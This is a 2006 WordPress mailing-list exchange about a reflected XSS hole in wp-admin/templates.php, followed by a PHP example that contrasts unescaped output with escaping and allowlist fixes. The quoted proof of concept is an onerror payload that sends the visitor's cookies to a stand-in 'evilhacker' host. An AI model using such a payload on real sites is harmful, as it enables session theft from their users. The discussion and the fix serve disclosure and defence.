[wp-hackers] Xss Vulnerability

Ryan Boren ryan at boren.nu
Thu Dec 28 17:48:07 GMT 2006


On 12/28/06, dabos <daboslab at gmail.com> wrote:
>
> Hi Guys. Tell me more about this Xss Vulnerability for Wp 2.0.5 in
> wp-admin/templates.php ?
>
> Proof of concept:
>
> https://blogsite/wp/wp-admin/templates.php?file=<img
> src=""onerror=javascript:
> document.location.href='http://evilhacker/captureco
> okie.php?'+document.cookie;>
>
> Is this the solution: http://trac.wordpress.org/changeset/4665 ?
>
> The last question, when the 2.0.6 final version ? Isn't this vulnerability
> in the 2.0.6 Rc 1 ?

For your testing pleasure:

http://wordpress.org/beta/wordpress-2.0.6-RC2.zip

Ryan
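The quoted proof of concept works because the value of the `file` query parameter is written back into the page without HTML escaping. The following is an added illustration, not code from WordPress or from the changeset linked above: it shows the vulnerable echo pattern beside the two defensive steps a reviewer would look for, escaping at the output boundary and validating the name against a known list of editable files. Function names and the allowlist are assumptions made for the example.

```php
<?php
// Added example (not WordPress code): a reflected parameter such as `file`
// becomes an XSS sink when it is interpolated raw into HTML.

// Vulnerable pattern (constructed): the query value is echoed unescaped, so
// markup in the parameter is rendered and any event handler in it executes.
function render_title_vulnerable(string $file): string {
    return "<h2>Editing $file</h2>";
}

// Hardened pattern: escape at the HTML output boundary. ENT_QUOTES also
// escapes single and double quotes, so attribute contexts are covered too.
function render_title_safe(string $file): string {
    return '<h2>Editing ' . htmlspecialchars($file, ENT_QUOTES, 'UTF-8') . '</h2>';
}

// Stronger still: refuse anything that is not a known, editable file.
// The allowlist is a constructed stand-in for whatever the application
// actually permits; strict comparison avoids type-juggling surprises.
function resolve_theme_file(string $file, array $allowed): ?string {
    return in_array($file, $allowed, true) ? $file : null;
}

// Constructed test input modelled on the payload shape quoted in the thread.
$payload = '<img src=""onerror=alert(1)>';

var_dump(render_title_vulnerable($payload));   // contains a live <img ...> tag
var_dump(render_title_safe($payload));         // &lt;img src=&quot;&quot;onerror=alert(1)&gt; (inert)
var_dump(resolve_theme_file($payload, ['index.php', 'style.css'])); // NULL: rejected
var_dump(resolve_theme_file('style.css', ['index.php', 'style.css'])); // "style.css"
```

Escaping fixes the reflection; the allowlist additionally stops the parameter from being used for anything other than the files the editor is meant to touch, which is the check to verify when reading a fix like the one linked above.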

